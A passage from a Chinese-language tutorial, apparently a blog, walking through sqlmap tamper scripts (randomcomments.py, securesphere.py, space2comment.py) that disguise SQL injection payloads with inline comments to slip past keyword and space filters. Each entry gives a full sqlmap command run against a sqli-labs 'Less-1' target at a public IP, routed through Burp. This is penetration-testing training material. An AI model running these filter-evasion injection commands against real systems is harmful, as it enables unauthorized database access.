35. randomcomments.py腳本
在payload關鍵字中隨機插入/**/,可以繞過關鍵字過濾,適用於所有數據庫
實戰演示:
測試地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="randomcomments.py" --proxy="http://127.0.0.1:8080" -batch

並未注入成功,看看burp抓包的效果

效果已經有了針對關鍵的payload增加/**/
=====================================================================================================================================
36. securesphere.py腳本
添加經過特殊構造的字符串,在payload后面加入字符串,據說是可以自定義的,適用於所有數據庫
實戰演示:
測試地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="securesphere.py" --proxy="http://127.0.0.1:8080" -batch
新版本的sqlmap已經不存在這個
====================================================================================================================================
37. space2comment.py腳本
使用/**/替換空格符,主要用於空格的繞過
測試地址:python sqlmap.py -u http://106.54.35.126/Less-1/?id=1 --dbs --tamper="space2comment.py" --proxy="http://127.0.0.1:8080" -batch


發現是可以注入的,看看burp抓包情況

